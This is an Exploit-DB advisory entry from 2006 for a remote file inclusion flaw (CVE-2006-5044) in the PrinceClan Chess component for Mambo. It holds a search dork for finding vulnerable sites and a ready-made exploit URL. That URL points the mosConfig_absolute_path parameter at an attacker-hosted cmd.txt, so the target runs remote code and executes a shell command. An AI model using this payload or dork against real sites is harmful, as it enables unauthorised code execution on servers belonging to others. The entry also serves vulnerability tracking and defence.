PrinceClan Chess Mambo Com <= 0.8 - Remote Inclusion Vulnerability

2006-07-24T00:00:00
ID EDB-ID:2069
Type exploitdb
Reporter OLiBekaS
Modified 2006-07-24T00:00:00

Description

PrinceClan Chess Mambo Com <= 0.8 Remote Inclusion Vulnerability. CVE-2006-5044. Webapps exploit for php platform

                                        
                                            # pc_chess Component

- dork : index.php?option=com_pcchess

- exploit :

http://[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls 

# milw0rm.com [2006-07-24]